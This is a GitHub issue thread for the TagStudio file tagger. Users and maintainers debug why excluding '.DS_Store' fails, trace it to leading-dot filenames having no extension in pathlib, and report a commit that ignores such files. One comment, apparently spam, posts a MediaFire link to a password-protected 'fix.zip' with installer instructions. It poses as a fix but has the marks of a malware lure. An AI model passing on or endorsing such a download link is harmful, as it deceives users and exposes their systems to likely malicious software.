### ISSUE TITLE
[Bug]: Ignoring `.DS_Store` files doesn't seem to work

### ISSUE THREAD

**Issue by vladfrangu** [TagStudioDev/TagStudio#399]
### Checklist

- [X] I am using an up-to-date version.
- [X] I have read the [documentation](https://github.com/TagStudioDev/TagStudio/blob/main/doc/index.md).
- [X] I have searched existing [issues](https://github.com/TagStudioDev/TagStudio/issues).

### TagStudio Version

Alpha 9.3.2

### Operating System & Version

macOS 15.0 Beta (24A5327a)

### Description

Using this on macOS, I tried ignoring `.DS_Store` files via the exclusion list for extensions. This however didn't seem to do anything (unless I did something wrong). I'd love to also try and help out debugging, which I may try later today if I've gotten some time 😅.

(If this is duplicated or wrongly filed, super sorry! Couldn't exactly tell if this was a feature req or a bug)

### Expected Behavior

Adding in `.DS_Store` to the ignored extensions should remove them from the UI

### Steps to Reproduce

1. Be on macOS (or just create a file called `.DS_Store` in your folder)
2. Add `.DS_Store` to the exclusion list (I see it gets lowercased but the code also seems to check lowercased anyways)
3. Refresh library and observe

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by CyanVoxel** [comment]
Looking at some of the DS_Store files I have collecting dust on my system (currently testing this on Windows) I have a hunch what it might be. Are the DS_Store files that remain after excluding `.ds_store` these type of "_DS_Store" with no extension? They also wouldn't have the "DS_STORE" extension label in TagStudio. The ones with the extension get excluded fine for me but the ones without it do not. 

![image](https://github.com/user-attachments/assets/3628605f-589b-4428-97a1-3d8b8da25ffc)

**Comment by CyanVoxel** [comment]
> This is what it currently shows for me. The exclusion of `.ds_store` didn't actually hide any of the files. 😅 And I thought it might've been the Google Drive virtual folder, but I tried another folder and the `.DS_Store` files still show up (and also don't get that `DS_STORE` label yours have

Ah, it's the leading solo dot in the filename causing the issue - I'm able to replicate it. I believe the `pathlib` Python library treats this as the entire filename with no extension, when really it should be doing the opposite for what we want here. ".DS_Store" is probably the *most likely* case affected by this but it could in theory affect any similar filename.

![image](https://github.com/user-attachments/assets/22ab5b8e-b690-41b1-868e-956533274f3e)

**Comment by Toby222** [comment]
a leading dot on unix-like systems is used to just mean "hidden" and isn't a file extension

**Comment by CyanVoxel** [comment]
`.DS_Store` files globally ignored in b72a2f233141db4db6aa6be8796b626ebd3f0756
